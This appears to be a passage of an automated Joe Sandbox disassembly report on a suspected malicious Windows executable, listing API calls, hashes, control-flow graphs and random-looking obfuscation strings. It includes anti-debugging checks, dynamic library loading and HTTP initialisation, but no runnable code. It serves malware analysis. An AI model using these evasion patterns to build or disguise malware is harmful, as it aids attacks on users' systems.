                                                                                            • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                            • Instruction Fuzzy Hash: E4F08234314F0D4FAB44EF7C9CDC135B7E0EBA8202700857A984AC6164EF34C4408701

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • _lcreat.KERNEL32(00000000,00000000), ref: 00401E84
                                                                                            • _hread.KERNEL32(00000000,00000000,00000000), ref: 00401E8D
                                                                                            • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401E99
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401EA0
                                                                                            • QueryDosDeviceW.KERNEL32(wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez,?,00000000), ref: 00401EB4
                                                                                            • _free.LIBCMT ref: 00401EBB
                                                                                              • Part of subcall function 004031CD: HeapFree.KERNEL32(00000000,00000000,?,00402C76,?,?,00401021), ref: 004031E3
                                                                                              • Part of subcall function 004031CD: GetLastError.KERNEL32(?,?,00402C76,?,?,00401021), ref: 004031F5
                                                                                              • Part of subcall function 0040354F: _malloc.LIBCMT ref: 0040355D
                                                                                              • Part of subcall function 004033A0: __indefinite.LIBCMT ref: 00405060
                                                                                            • __floor_pentium4.LIBCMT ref: 00401EDF
                                                                                            • SetFilePointer.KERNELBASE(00000000,5D8DD343,00000000,00000000,3B09B99F,1C76D52B,1A1DACC1,7C3F92FE,660FFCA4,76D4F808,3E8EECA6,07B34857,42B591E9,43C33179,0787356F,7E982BF0), ref: 00401F02
                                                                                            • GetTickCount.KERNEL32 ref: 00401F04
                                                                                            • GetLastError.KERNEL32 ref: 00401F06
                                                                                            • GetCharWidthI.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 00401F37
                                                                                            • GetCurrentDirectoryA.KERNEL32(00000000,?), ref: 00401F82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFreeLast$CalendarCharCountCurrentDeviceDirectoryFileGlobalHeapInfoPointerQueryTickWidth__floor_pentium4__indefinite_free_hread_lcreat_malloc
                                                                                            • String ID: ":,x$7-T=$GxBn$J}s`$K`:$O$b~$ls/K$wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez
                                                                                            • API String ID: 796562619-3640916101
                                                                                            • Opcode ID: 51c8ccf92fe4c139f84cf6e624a06a0f929477bf1cc2a39590fbfa169ac6ddbd
                                                                                            • Instruction ID: 8b614c5b00c1f65204cbdd4fc9108d5837f97232f0cc16e95afeebc5dbee127e
                                                                                            • Opcode Fuzzy Hash: 51c8ccf92fe4c139f84cf6e624a06a0f929477bf1cc2a39590fbfa169ac6ddbd
                                                                                            • Instruction Fuzzy Hash: 0FF10EB5609380CFD2648F6AD589B8FFBE4BF85314F10891DEA999B620D7308885CF57

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004014C8
                                                                                            • GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 004014CE
                                                                                            • CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 004014FF
                                                                                            • FoldStringW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040150C
                                                                                            • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00401514
                                                                                            • CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 0040151E
                                                                                            • CreateHardLinkA.KERNEL32(vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga,tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy,00000000), ref: 00401532
                                                                                            • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 0040153D
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00401547
                                                                                            • _strlen.LIBCMT ref: 0040155F
                                                                                            • LocalAlloc.KERNEL32(00000000,?), ref: 004015B2
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004015C8
                                                                                            • GetProcAddress.KERNEL32(00000000,00444BC8), ref: 00401604
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00401640
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00401689
                                                                                            • GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401693
                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040169B
                                                                                            • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 004016A9
                                                                                            • DebugBreak.KERNEL32(?,?,?,00000000), ref: 004016AF
                                                                                            • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004016ED
                                                                                            • SetEnvironmentVariableW.KERNEL32(hiramemepugatipowuzela,venogoricilagudofufoyiz), ref: 004016F9
                                                                                            • OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00401701
                                                                                            • GetLastError.KERNEL32 ref: 00401720
                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040176E
                                                                                            • GetShortPathNameW.KERNEL32(dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler,?,00000000), ref: 0040177E
                                                                                            • LocalFlags.KERNEL32(00000000), ref: 00401782
                                                                                            • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040178C
                                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040179A
                                                                                            • SetComputerNameA.KERNEL32(00000000), ref: 004017A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create$ErrorFileInterlockedLastLibraryLoadLocalNameOpenString$AddressAllocAttributesBreakCharCodeCompareComputerConsoleCurrentDebugDecrementDiskEnumEnvironmentEventExceptionExchangeFlagsFoldFreeHardHttpInputLinkPagesPathProcProcessRaiseReadShortSpaceSystemTimeVariableWidth32_strlen
                                                                                            • String ID: $Bq $dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$gulepulawoboxejobukade$hiramemepugatipowuzela$jjj$jjjj$kernel32.dll$tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy$u4j$venogoricilagudofufoyiz$vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga${
                                                                                            • API String ID: 3259815418-1288099099
                                                                                            • Opcode ID: 1c7a30fab64593d96da5b7858b42650fb8546a0fed917d5484161022a4229a46
                                                                                            • Instruction ID: 356d4041f10d2f29db6dbd7432f84ad9d0424ca7bcfc11c8b50bcae8f6dbb1b2
                                                                                            • Opcode Fuzzy Hash: 1c7a30fab64593d96da5b7858b42650fb8546a0fed917d5484161022a4229a46
                                                                                            • Instruction Fuzzy Hash: 5591B1B5D44214AFE710AF65ED85BAA7B78FB45709F104839F605B72E0CBB85800CBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00401180
                                                                                            • GetNumberFormatW.KERNEL32(00000000,00000000,sogudowuwotekonex digimabawer rujusogepisalojar,00000000,?,00000000), ref: 004011DA
                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004011E5
                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004011F8
                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00401204
                                                                                            • GetStdHandle.KERNEL32(00000000), ref: 0040120C
                                                                                            • GetComputerNameW.KERNEL32(?,?), ref: 0040121D
                                                                                            • ClearCommBreak.KERNEL32(00000000), ref: 00401225
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 0040122F
                                                                                            • EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040123D
                                                                                            • GetTempPathA.KERNEL32(00000000,?), ref: 00401248
                                                                                            • _memset.LIBCMT ref: 0040125D
                                                                                            • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 0040126D
                                                                                            • GetVersionExW.KERNEL32(?), ref: 0040127A
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00401287
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 00401291
                                                                                            • GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004012A2
                                                                                            • EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004012B0
                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 004012BF
                                                                                            • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 004012D8
                                                                                            • GlobalWire.KERNEL32(00000000), ref: 004012E0
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,yoyorohexumutuwasetebayuda), ref: 0040131D
                                                                                            Strings
                                                                                            • sogudowuwotekonex digimabawer rujusogepisalojar, xrefs: 004011D1
                                                                                            • , xrefs: 00401142
                                                                                            • yoyorohexumutuwasetebayuda, xrefs: 00401312
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Info$CalendarCommCreateEnumFileInterlockedNamePathVersion$AttributesBreakClearComputerConfigCopyDecrementDialogDriveEventFormatGlobalHandleIncrementLocaleLogicalMountNumberPointShortStringsTempVerifyVolumeWire_memset
                                                                                            • String ID: $sogudowuwotekonex digimabawer rujusogepisalojar$yoyorohexumutuwasetebayuda
                                                                                            • API String ID: 4125211919-822714830
                                                                                            • Opcode ID: cad9de049f8f27f91a41107709eabf3daf181dbbc58ac01bfadc70c1cc3b8694
                                                                                            • Instruction ID: a822d109fb70ae75058a0a4b7bb429345da21f1934e5888e6a3cea804fba91e2
                                                                                            • Opcode Fuzzy Hash: cad9de049f8f27f91a41107709eabf3daf181dbbc58ac01bfadc70c1cc3b8694
                                                                                            • Instruction Fuzzy Hash: E3716A75E40219AFEB10DFA5DD49B9EB7B4FB48701F108469E608BB2D0C7B46A40CF69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004013BF
                                                                                            • CreateJobObjectW.KERNEL32(00000000,zamuloguwatisofobus), ref: 004013C8
                                                                                            • GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 004013D3
                                                                                            • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004013DF
                                                                                            • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004013F5
                                                                                            • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 004013FF
                                                                                            • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 00401409
                                                                                            • GetTimeFormatA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040141B
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00401427
                                                                                            • TlsSetValue.KERNEL32(00000000,00000000), ref: 0040142D
                                                                                            • SetVolumeMountPointW.KERNEL32(00000000,?), ref: 0040143C
                                                                                            • GetEnvironmentVariableA.KERNEL32(00000000,?,00000000), ref: 0040144D
                                                                                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep), ref: 0040145E
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040146F
                                                                                            Strings
                                                                                            • zamuloguwatisofobus, xrefs: 004013C1
                                                                                            • gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep, xrefs: 00401453
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileName$CreateFormatModule$AliasCalendarConsoleDateEnumEnvironmentExesFormatsInfoMountNamedNumberObjectParametersPipePointProcessShortShutdownTimeValueVariableVolume
                                                                                            • String ID: gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep$zamuloguwatisofobus
                                                                                            • API String ID: 3743761972-355902816
                                                                                            • Opcode ID: 3128c6d63ce5f64c3af40b3ea0140d5989af5d9dddbbdd0500db31e5f157e556
                                                                                            • Instruction ID: 85a714800d049f8b42b38d3012af1d189035c7edfbcc51f85ffd02250f5699ef
                                                                                            • Opcode Fuzzy Hash: 3128c6d63ce5f64c3af40b3ea0140d5989af5d9dddbbdd0500db31e5f157e556
                                                                                            • Instruction Fuzzy Hash: ED318D76784314BBF7109BA2AD4AF997764EB08B02F104465F708BA1D0CAF06950CB79

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004078F7
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040790C
                                                                                            • UnhandledExceptionFilter.KERNEL32((HD), ref: 00407917
                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00407933
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 0040793A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                            • String ID: (HD
                                                                                            • API String ID: 2579439406-2148437710
                                                                                            • Opcode ID: 0cca4cb3f6c34e2bac765e9ca107058cf167fc74ec1c3ba3081b062c0abda26a
                                                                                            • Instruction ID: 7c49ad6c5058463ad118c416b144a0f7b5f21ff1462cb7ffb68cc8e8a676fc82
                                                                                            • Opcode Fuzzy Hash: 0cca4cb3f6c34e2bac765e9ca107058cf167fc74ec1c3ba3081b062c0abda26a
                                                                                            • Instruction Fuzzy Hash: E321EFBC802204DBD700EF66FD897167BE0BB8A315F11143AE908A73A1EB745981AB4D
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000631A), ref: 00406361
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: eac57621da90cc809f0097ce8559889bf2519d77c8f79c97426d879ceac02f12
                                                                                            • Instruction ID: 646d0ba3557a20301b4c37877e7552472355a53ce9fee5a1e0a4ed321b8263d8
                                                                                            • Opcode Fuzzy Hash: eac57621da90cc809f0097ce8559889bf2519d77c8f79c97426d879ceac02f12
                                                                                            • Instruction Fuzzy Hash: 1A900270252104C6CA101B719D0D50625906A8C60B7520C71A402EC094DA7444205959

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 156 405dd6-405de8 GetModuleHandleW 157 405df3-405e3b GetProcAddress * 4 156->157 158 405dea-405df2 call 405b23 156->158 160 405e53-405e72 157->160 161 405e3d-405e44 157->161 164 405e77-405e85 TlsAlloc 160->164 161->160 163 405e46-405e4d 161->163 163->160 165 405e4f-405e51 163->165 166 405e8b-405e96 TlsSetValue 164->166 167 405f4c 164->167 165->160 165->164 166->167 168 405e9c-405ee2 call 4036a2 EncodePointer * 4 call 405678 166->168 169 405f4e-405f50 167->169 174 405ee4-405f01 DecodePointer 168->174 175 405f47 call 405b23 168->175 174->175 178 405f03-405f15 call 40450a 174->178 175->167 178->175 181 405f17-405f2a DecodePointer 178->181 181->175 183 405f2c-405f45 call 405b60 GetCurrentThreadId 181->183 183->169
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00403A6B), ref: 00405DDE
                                                                                            • __mtterm.LIBCMT ref: 00405DEA
                                                                                              • Part of subcall function 00405B23: DecodePointer.KERNEL32(00000004,00405F4C,?,00403A6B), ref: 00405B34
                                                                                              • Part of subcall function 00405B23: TlsFree.KERNEL32(00000003,00405F4C,?,00403A6B), ref: 00405B4E
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00405E00
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00405E0D
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00405E1A
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00405E27
                                                                                            • TlsAlloc.KERNEL32(?,00403A6B), ref: 00405E77
                                                                                            • TlsSetValue.KERNEL32(00000000,?,00403A6B), ref: 00405E92
                                                                                            • __init_pointers.LIBCMT ref: 00405E9C
                                                                                            • EncodePointer.KERNEL32(?,00403A6B), ref: 00405EAD
                                                                                            • EncodePointer.KERNEL32(?,00403A6B), ref: 00405EBA
                                                                                            • EncodePointer.KERNEL32(?,00403A6B), ref: 00405EC7
                                                                                            • EncodePointer.KERNEL32(?,00403A6B), ref: 00405ED4
                                                                                            • DecodePointer.KERNEL32(00405CA7,?,00403A6B), ref: 00405EF5
                                                                                            • __calloc_crt.LIBCMT ref: 00405F0A
                                                                                            • DecodePointer.KERNEL32(00000000,?,00403A6B), ref: 00405F24
                                                                                            • __initptd.LIBCMT ref: 00405F2F
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00405F36
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PNv
                                                                                            • API String ID: 3732613303-2259100434
                                                                                            • Opcode ID: 058c4305fbcc8a05b464aad084c638694769c468d8d830ac7ff23fc5814ed724
                                                                                            • Instruction ID: 49f715d1ab0fd03b29b3072b70511d18e901dfbf6f68d4dbe0345dc55c82754a
                                                                                            • Opcode Fuzzy Hash: 058c4305fbcc8a05b464aad084c638694769c468d8d830ac7ff23fc5814ed724
                                                                                            • Instruction Fuzzy Hash: 5F31A035C00611AAE710AF76ED0AE1B7EB4EB0AB51B10093BE450E22E0D73A8515CF9C

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00401689
                                                                                            • GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401693
                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040169B
                                                                                            • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 004016A9
                                                                                            • DebugBreak.KERNEL32(?,?,?,00000000), ref: 004016AF
                                                                                            • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004016ED
                                                                                            • SetEnvironmentVariableW.KERNEL32(hiramemepugatipowuzela,venogoricilagudofufoyiz), ref: 004016F9
                                                                                            • OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00401701
                                                                                            • GetLastError.KERNEL32 ref: 00401720
                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040176E
                                                                                            • GetShortPathNameW.KERNEL32(dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler,?,00000000), ref: 0040177E
                                                                                            • LocalFlags.KERNEL32(00000000), ref: 00401782
                                                                                            • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040178C
                                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040179A
                                                                                            • SetComputerNameA.KERNEL32(00000000), ref: 004017A2
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004017B5
                                                                                            • LoadLibraryW.KERNEL32(0044DAB0), ref: 0040181C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileInterlockedLibraryLoadName$AttributesBreakCompareComputerConsoleDebugDecrementDiskEnvironmentErrorEventExceptionExchangeFlagsFreeInputLastLocalOpenPathRaiseReadShortSpaceStringTimeVariable
                                                                                            • String ID: dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$hiramemepugatipowuzela$jjj$jjjj$u4j$venogoricilagudofufoyiz${
                                                                                            • API String ID: 2963091761-1312479106
                                                                                            • Opcode ID: e820062dd700b24326c586c3433f1f5ae17b31e7c30448c33e5fc95965b6c65e
                                                                                            • Instruction ID: 378251b498804d731e0de826336589f14abb319e121f37aa39cfd513c37794a7
                                                                                            • Opcode Fuzzy Hash: e820062dd700b24326c586c3433f1f5ae17b31e7c30448c33e5fc95965b6c65e
                                                                                            • Instruction Fuzzy Hash: D1418C35A48314ABF720ABA1ED46B9A7770FB45B05F104439E705BB6E0CBF46811CBAD

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 219 4033d0-4033f8 DecodePointer * 2 220 4033fe-403408 219->220 221 40347f 219->221 220->221 222 40340a-403418 call 4050a9 220->222 223 403481-403485 221->223 226 403462-40347d EncodePointer * 2 222->226 227 40341a-403421 222->227 226->223 228 403423 227->228 229 403425-403429 227->229 228->229 230 40343a-40343f 229->230 231 40342b-40342c 229->231 230->221 233 403441-403442 230->233 232 40342f call 404556 231->232 234 403434-403438 232->234 235 403445 call 404556 233->235 234->230 236 403450-40345d EncodePointer 234->236 237 40344a-40344e 235->237 236->226 237->221 237->236
                                                                                            APIs
                                                                                            • DecodePointer.KERNEL32(00443E2C,0040E290,?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 004033E5
                                                                                            • DecodePointer.KERNEL32(?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 004033F2
                                                                                            • __realloc_crt.LIBCMT ref: 0040342F
                                                                                            • __realloc_crt.LIBCMT ref: 00403445
                                                                                            • EncodePointer.KERNEL32(00000000,?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 00403457
                                                                                            • EncodePointer.KERNEL32(?,?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 0040346B
                                                                                            • EncodePointer.KERNEL32(-00000004,?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 00403473
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
